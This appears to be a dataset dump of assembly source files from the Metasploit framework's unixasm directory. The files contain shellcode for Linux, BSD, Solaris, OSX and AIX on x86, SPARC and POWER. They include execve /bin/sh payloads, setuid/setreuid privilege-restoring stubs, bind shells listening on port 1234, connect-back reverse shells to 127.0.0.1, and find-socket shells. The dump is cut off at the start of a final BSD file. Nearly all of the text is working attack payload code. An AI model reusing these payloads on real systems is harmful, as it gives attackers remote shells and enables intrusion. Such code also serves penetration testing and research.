repo_id stringlengths 5 115 | size int64 590 5.01M | file_path stringlengths 4 212 | content stringlengths 590 5.01M |
|---|---|---|---|
OpenWireSec/metasploit | 2,331 | external/source/unixasm/lin-power-cntsockcode64.S | /*
* lin-power-cntsockcode64.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
.globl main
main:
cntsockcode64:
xor %r31,%r31,%r31
lil %r29,__CAL
# socket
cal %r28,-511+1(%r29)
cal %r27,-511+2(%r29)
stdu %r31,-8(%r1)
stdu %r28,-8(%r1)
stdu %r27,-8(%r1)
mr %r4,%r1
cal %r3,__NC_socket(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
mr %r26,%r3
# connect
cal %r25,-511+16(%r29)
/*
* The following GPRs result in zeros when used with liu instruction.
* %r24, %r16, %r8, %r0
*
*/
liu %r23,0x7f00
oril %r23,%r23,0x0001
lil %r22,0x04d2
stu %r23,-4(%r1)
stu %r22,-4(%r1)
st %r27,-2(%r1)
mr %r21,%r1
stdu %r25,-8(%r1)
stdu %r21,-8(%r1)
stdu %r26,-8(%r1)
mr %r4,%r1
cal %r3,__NC_connect(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
0:
# dup2
mr %r4,%r27
mr %r3,%r26
cal %r0,__NC_dup2(%r29)
.long 0x44ffff02
ai. %r27,%r27,-1
bge 0b
shellcode64:
# lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode64
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+36(%r30)
stb %r5,-511+43(%r30)
stdu %r5,-8(%r1)
stdu %r3,-8(%r1)
mr %r4,%r1
# cal %r0,__NC_execve(%r31)
cal %r0,__NC_execve(%r29)
.long 0x44ffff02
.asciz "/bin/sh"
|
OpenWireSec/metasploit | 1,524 | external/source/unixasm/lin-x86-shellcode.s | /*
* lin-x86-shellcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
setresuidcode:
xorl %ecx,%ecx
xorl %ebx,%ebx
mull %ebx
movb $0xa4,%al
int $0x80
setreuidcode:
xorl %ecx,%ecx
xorl %ebx,%ebx
pushl $0x46
popl %eax
int $0x80
setuidcode:
xorl %ebx,%ebx
pushl $0x17
popl %eax
int $0x80
exitcode:
xorl %ebx,%ebx
pushl $0x01
popl %eax
int $0x80
# 24 bytes
shellcode:
xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
cltd
movb $0x0b,%al
int $0x80
|
OpenWireSec/metasploit | 3,092 | external/source/unixasm/aix-power-bndsockcode64.S | /*
* $Id: aix-power-bndsockcode64.S 40 2008-11-17 02:45:30Z ramon $
*
* aix-power-bndsockcode64.S - AIX Power Network server code
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Compile with the following command.
* $ gcc -Wall -DAIXLEVEL -m64 -o aix-power-bndsockcode64
* aix-power-bndsockcode64.S
*
* Where AIXLEVEL is one of the currently supported AIX levels.
* -DV530 AIX 5.3.0
*
*/
#include "aix-power.h"
.globl .main
.csect .text[PR]
.main:
syscallcode:
xor. %r31,%r31,%r31
bnel syscallcode
mflr %r30
cal %r30,511(%r30)
cal %r30,-511+28(%r30)
mtctr %r30
bctr
crorc %cr6,%cr6,%cr6
.long 0x44ffff02
cal %r30,-8(%r30)
bndsockcode:
lil %r29,__CAL
# socket
xor %r5,%r5,%r5
cal %r4,-511+1(%r29)
cal %r3,-511+2(%r29)
cal %r2,__NC_socket(%r29)
mtctr %r30
bctrl
mr %r28,%r3
# bind
cal %r5,-511+16(%r29)
liu %r27,0xff02
oril %r27,%r27,0x04d2
stu %r31,-4(%r1)
stu %r27,-4(%r1)
mr %r4,%r1
cal %r2,__NC_bind(%r29)
mtctr %r30
bctrl
# listen
xor %r4,%r4,%r4
mr %r3,%r28
cal %r2,__NC_listen(%r29)
mtctr %r30
bctrl
# accept
xor %r5,%r5,%r5
xor %r4,%r4,%r4
mr %r3,%r28
cal %r2,__NC_accept(%r29)
mtctr %r30
bctrl
mr %r26,%r3
# close
cal %r25,-511+2(%r29)
0:
mr %r3,%r25
cal %r2,__NC_close(%r29)
mtctr %r30
bctrl
# kfcntl
mr %r5,%r25
xor %r4,%r4,%r4
mr %r3,%r26
cal %r2,__NC_kfcntl(%r29)
mtctr %r30
bctrl
ai. %r25,%r25,-1
bge 0b
shellcode64:
# lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode64
# mflr %r30
# cal %r30,511(%r30)
# cal %r3,-511+40(%r30)
# stb %r5,-511+48(%r30)
mflr %r24
cal %r24,511(%r24)
cal %r3,-511+40(%r24)
stb %r5,-511+48(%r24)
stdu %r5,-8(%r1)
stdu %r3,-8(%r1)
mr %r4,%r1
# cal %r2,__NC_execve(%r31)
cal %r2,__NC_execve(%r29)
# crorc %cr6,%cr6,%cr6
# .long 0x44ffff02
mtctr %r30
bctrl
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 1,567 | external/source/unixasm/lin-x86-fndsockcode.s | /*
* lin-x86-fndsockcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 62 bytes
fndsockcode:
xorl %ebx,%ebx
pushl %ebx
movl %esp,%edi
pushl $0x10
pushl %esp
pushl %edi
pushl %ebx
movl %esp,%ecx
movb $0x07,%bl
0:
incl (%ecx)
pushl $0x66
popl %eax
int $0x80
cmpw $0xd204,0x02(%edi)
jne 0b
popl %ebx
pushl $0x02
popl %ecx
1:
movb $0x3f,%al
int $0x80
decl %ecx
jns 1b
shellcode:
# xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
cltd
movb $0x0b,%al
int $0x80
|
OpenWireSec/metasploit | 1,248 | external/source/unixasm/lin-power-shellcode64.S | /*
* lin-power-shellcode64.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
.globl main
main:
shellcode64:
lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode64
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+36(%r30)
stb %r5,-511+43(%r30)
stdu %r5,-8(%r1)
stdu %r3,-8(%r1)
mr %r4,%r1
cal %r0,__NC_execve(%r31)
.long 0x44ffff02
.asciz "/bin/sh"
|
OpenWireSec/metasploit | 1,367 | external/source/unixasm/sol-sparc-shellcode.s | /*
* sol-sparc-shellcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.globl _start
_start:
# 00 bytes
setreuidcode:
xor %o1,%o1,%o1
xor %o0,%o0,%o0
mov 0xca,%g1
ta 0x08
setuidcode:
xor %o0,%o0,%o0
mov 0x17,%g1
ta 0x08
shellcode:
xor %o2,%o2,%o2
sethi %hi(0x2f62696e),%l0
or %l0,0x96e,%l0
sethi %hi(0x2f736800),%l1
std %l0,[%sp-0x08]
sub %sp,0x08,%o0
st %o0,[%sp-0x10]
st %g0,[%sp-0x0c]
sub %sp,0x10,%o1
mov 0x3b,%g1
ta 0x08
|
OpenWireSec/metasploit | 1,665 | external/source/unixasm/lin-x86-cntsockcode.s | /*
* lin-x86-cntsockcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 71 bytes
cntsockcode:
xorl %ebx,%ebx
mull %ebx
pushl %ebx
incl %ebx
pushl %ebx
pushl $0x02
movl %esp,%ecx
movb $0x66,%al
int $0x80
popl %ebx
popl %esi
pushl $0x0100007f
pushw $0xd204
pushw %bx
pushl $0x10
pushl %ecx
pushl %eax
movl %esp,%ecx
incl %ebx
pushl $0x66
popl %eax
int $0x80
popl %ecx
xchgl %ebx,%ecx
0:
movb $0x3f,%al
int $0x80
decl %ecx
jns 0b
shellcode:
# xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
# cltd
movb $0x0b,%al
int $0x80
|
OpenWireSec/metasploit | 1,599 | external/source/unixasm/bsd-x86-shellcode.s | /*
* bsd-x86-shellcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
setresuidcode:
xorl %eax,%eax
pushl %eax
pushl %eax
pushl %eax
pushl %eax
movw $0x0137,%ax
int $0x80
setreuidcode:
xorl %eax,%eax
pushl %eax
pushl %eax
pushl %eax
movb $0x7e,%al
int $0x80
setuidcode:
xorl %eax,%eax
pushl %eax
pushl %eax
movb $0x17,%al
int $0x80
exitcode:
xorl %eax,%eax
pushl %eax
movb $0x01,%al
int $0x80
# 23 bytes
shellcode:
xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
|
OpenWireSec/metasploit | 1,686 | external/source/unixasm/bsd-x86-bndsockcode.s | /*
* bsd-x86-bndsockcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 73 bytes
bndsockcode:
xorl %eax,%eax
pushl %eax
pushl $0xd20402ff
movl %esp,%edi
pushl %eax
pushl $0x01
pushl $0x02
pushl $0x10
movb $0x61,%al
int $0x80
pushl %edi
pushl %eax
pushl %eax
pushl $0x68
popl %eax
int $0x80
movl %eax,-0x14(%edi)
movb $0x6a,%al
int $0x80
movb $0x1e,%al
int $0x80
pushl %eax
pushl %eax
0:
pushl $0x5a
popl %eax
int $0x80
decl -0x1c(%edi)
jns 0b
shellcode:
# xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
|
OpenWireSec/metasploit | 1,694 | external/source/unixasm/aix-power-shellcode64.S | /*
* $Id: aix-power-shellcode64.S 40 2008-11-17 02:45:30Z ramon $
*
* aix-power-shellcode64.S - AIX Power shellcode
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Compile with the following command.
* $ gcc -Wall -DAIXLEVEL -m64 -o aix-power-shellcode64 aix-power-shellcode64.S
*
* Where AIXLEVEL is one of the currently supported AIX levels.
* -DV410 AIX 4.1.0
* -DV420 AIX 4.2.0
* -DV430 AIX 4.3.0
* -DV433 AIX 4.3.3
* -DV530 AIX 5.3.0
*
*/
#include "aix-power.h"
.globl .main
.csect .text[PR]
.main:
shellcode64:
lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode64
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+40(%r30)
stb %r5,-511+48(%r30)
stdu %r5,-8(%r1)
stdu %r3,-8(%r1)
mr %r4,%r1
cal %r2,__NC_execve(%r31)
crorc %cr6,%cr6,%cr6
.long 0x44ffff02
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 2,788 | external/source/unixasm/aix-power-cntsockcode64.S | /*
* $Id: aix-power-cntsockcode64.S 40 2008-11-17 02:45:30Z ramon $
*
* aix-power-cntsockcode64.S - AIX Power Network connect code
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Compile with the following command.
* $ gcc -Wall -DAIXLEVEL -m64 -o aix-power-cntsockcode64
* aix-power-cntsockcode64.S
*
* Where AIXLEVEL is one of the currently supported AIX levels.
* -DV530 AIX 5.3.0
*
*/
#include "aix-power.h"
.globl .main
.csect .text[PR]
.main:
syscallcode:
# xor. %r31,%r31,%r31
xor. %r5,%r5,%r5
bnel syscallcode
mflr %r30
cal %r30,511(%r30)
cal %r30,-511+36(%r30)
mtctr %r30
bctr
.long 0xff0204d2
.long 0x7f000001
crorc %cr6,%cr6,%cr6
.long 0x44ffff02
cal %r30,-8(%r30)
cntsockcode:
lil %r29,__CAL
# socket
# xor %r5,%r5,%r5
cal %r4,-511+1(%r29)
cal %r3,-511+2(%r29)
cal %r2,__NC_socket(%r29)
mtctr %r30
bctrl
mr %r28,%r3
# connect
cal %r5,-511+16(%r29)
cal %r4,-8(%r30)
cal %r2,__NC_connect(%r29)
mtctr %r30
bctrl
# close
cal %r27,-511+2(%r29)
0:
mr %r3,%r27
cal %r2,__NC_close(%r29)
mtctr %r30
bctrl
# kfcntl
mr %r5,%r27
xor %r4,%r4,%r4
mr %r3,%r28
cal %r2,__NC_kfcntl(%r29)
mtctr %r30
bctrl
ai. %r27,%r27,-1
bge 0b
shellcode64:
# lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode64
# mflr %r30
# cal %r30,511(%r30)
# cal %r3,-511+40(%r30)
# stb %r5,-511+48(%r30)
mflr %r24
cal %r24,511(%r24)
cal %r3,-511+40(%r24)
stb %r5,-511+48(%r24)
stdu %r5,-8(%r1)
stdu %r3,-8(%r1)
mr %r4,%r1
# cal %r2,__NC_execve(%r31)
cal %r2,__NC_execve(%r29)
# crorc %cr6,%cr6,%cr6
# .long 0x44ffff02
mtctr %r30
bctrl
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 1,583 | external/source/unixasm/osx-x86-cntsockcode.s | /*
* osx-x86-cntsockcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 65 bytes
cntsockcode:
pushl $0x0100007f
pushl $0xd20402ff
movl %esp,%edi
xorl %eax,%eax
pushl %eax
pushl $0x01
pushl $0x02
pushl $0x10
movb $0x61,%al
int $0x80
pushl %edi
pushl %eax
pushl %eax
pushl $0x62
popl %eax
int $0x80
pushl %eax
0:
pushl $0x5a
popl %eax
int $0x80
decl -0x18(%edi)
jns 0b
shellcode:
# xorl %eax,%eax
# pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %esp
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
|
OpenWireSec/metasploit | 2,345 | external/source/unixasm/sol-x86-bndsockcode.s | /*
* sol-x86-bndsockcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Socket versions. Used by the socket library when calling _so_socket().
*/
#define SOV_STREAM 0 /* Not a socket - just a stream */
#define SOV_DEFAULT 1 /* Select based on so_default_version */
#define SOV_SOCKSTREAM 2 /* Socket plus streams operations */
#define SOV_SOCKBSD 3 /* Socket with no streams operations */
#define SOV_XPG4_2 4 /* Xnet socket */
.global _start
_start:
# 95 bytes
syscallcode:
pushl $0x3cffd8ff
pushl $0x65
movl %esp,%esi
notl 0x04(%esi)
notb (%esi)
bndsockcode:
xorl %eax,%eax
pushl %eax
pushl $0xd20402ff
movl %esp,%edi
pushl $0x02 /* SOV_SOCKSTREAM */
pushl %eax
pushl %eax
pushl $0x02
pushl $0x02 /* Used as SOV_SOCKSTREAM when calling bind() */
movb $0xe6,%al
call *%esi
pushl $0x10
pushl %edi
pushl %eax
xorl %eax,%eax
movb $0xe8,%al
call *%esi
popl %ebx
pushl %eax
pushl %eax
pushl %ebx
movb $0xe9,%al
call *%esi
movb $0xea,%al
call *%esi
pushl $0x09
pushl %eax
0:
pushl $0x3e
popl %eax
call *%esi
decl -0x28(%edi)
jns 0b
shellcode:
# xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
pushl %eax
pushl %ecx
pushl %ebx
movb $0x3b,%al
call *%esi
|
OpenWireSec/metasploit | 1,792 | external/source/unixasm/lin-x86-bndsockcode.s | /*
* lin-x86-bndsockcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 78 bytes
bndsockcode:
xorl %ebx,%ebx
mull %ebx
pushl %ebx
incl %ebx
pushl %ebx
pushl $0x02
movl %esp,%ecx
movb $0x66,%al
int $0x80
popl %ebx
popl %esi
pushl %edx
pushl $0xd20402ff
pushl $0x10
pushl %ecx
pushl %eax
movl %esp,%ecx
pushl $0x66
popl %eax
int $0x80
movl %eax,0x04(%ecx)
movb $0x04,%bl
movb $0x66,%al
int $0x80
incl %ebx
movb $0x66,%al
int $0x80
xchgl %eax,%ebx
popl %ecx
0:
pushl $0x3f
popl %eax
int $0x80
decl %ecx
jns 0b
shellcode:
# xorl %eax,%eax
# pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
# cltd
movb $0x0b,%al
int $0x80
|
OpenWireSec/metasploit | 2,045 | external/source/unixasm/sol-sparc-bndsockcode.s | /*
* sol-sparc-bndsockcode.s
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.globl _start
_start:
# 00 bytes
bndsockcode:
# so_socket
mov 0x02,%o4
xor %o3,%o3,%o3
xor %o2,%o2,%o2
mov 0x02,%o1
mov 0x02,%o0
mov 0xe6,%g1
ta 0x08
st %o0,[%sp-0x08]
# bind
set 0x204d2fff,%l0
srl %l0,12,%l0
mov 0x02,%o3
mov 0x10,%o2
st %l0,[%sp-0x10]
st %g0,[%sp-0x0c]
sub %sp,0x10,%o1
mov 0xe8,%g1
ta 0x08
# listen
mov 0x05,%o1
ld [%sp-0x08],%o0
mov 0xe9,%g1
ta 0x08
# accept
xor %o2,%o2,%o2
xor %o1,%o1,%o1
ld [%sp-0x08],%o0
mov 0xea,%g1
ta 0x08
st %o0,[%sp-0x04]
# fcntl
mov 0x03,%o2
0:
subcc %o2,1,%o2
mov 0x09,%o1
mov 0x3e,%g1
ta 0x08
bnz,a 0b
ld [%sp-0x04],%o0
shellcode:
xor %o2,%o2,%o2
sethi %hi(0x2f62696e),%l0
or %l0,0x96e,%l0
sethi %hi(0x2f736800),%l1
std %l0,[%sp-0x08]
sub %sp,0x08,%o0
st %o0,[%sp-0x10]
st %g0,[%sp-0x0c]
sub %sp,0x10,%o1
mov 0x3b,%g1
ta 0x08
|
OpenWireSec/metasploit | 2,109 | external/source/unixasm/lin-power-fndsockcode.S | /*
* lin-power-fndsockcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
.globl main
main:
fndsockcode:
xor %r31,%r31,%r31
lil %r29,__CAL
# getpeername
stu %r31,-4(%r1)
mr %r28,%r1
cal %r27,-511+16(%r29)
stu %r27,-4(%r1)
mr %r26,%r1
stu %r26,-4(%r1)
stu %r28,-4(%r1)
stu %r31,-4(%r1)
0:
cal %r31,511(%r31)
cal %r31,-511+1(%r31)
cal %r1,511(%r1)
cal %r1,-511+4(%r1)
stu %r31,-4(%r1)
mr %r4,%r1
cal %r3,__NC_getpeername(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
cal %r25,511(%r28)
lhz %r25,-511+2(%r25)
cmpli 0,%r25,1234
bne 0b
cal %r24,-511+2(%r29)
1:
# dup2
mr %r4,%r24
mr %r3,%r31
cal %r0,__NC_dup2(%r29)
.long 0x44ffff02
ai. %r24,%r24,-1
bge 1b
shellcode:
# lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+36(%r30)
stb %r5,-511+43(%r30)
stu %r5,-4(%r1)
stu %r3,-4(%r1)
mr %r4,%r1
# cal %r0,__NC_execve(%r31)
cal %r0,__NC_execve(%r29)
.long 0x44ffff02
.asciz "/bin/sh"
|
OpenWireSec/metasploit | 1,576 | external/source/unixasm/sol-x86-shellcode.s | /*
* sol-x86-shellcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
syscallcode:
pushl $0x3cffd8ff
pushl $0x65
movl %esp,%esi
notl 0x04(%esi)
notb (%esi)
setreuidcode:
xorl %eax,%eax
pushl %eax
pushl %eax
movb $0xca,%al
call *%esi
setuidcode:
xorl %eax,%eax
pushl %eax
movb $0x17,%al
call *%esi
exitcode:
xorl %eax,%eax
pushl %eax
movb $0x01,%al
call *%esi
# 26 bytes
shellcode:
xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
pushl %eax
pushl %ecx
pushl %ebx
movb $0x3b,%al
call *%esi
|
OpenWireSec/metasploit | 1,594 | external/source/unixasm/bsd-x86-fndsockcode.s | /*
* bsd-x86-fndsockcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
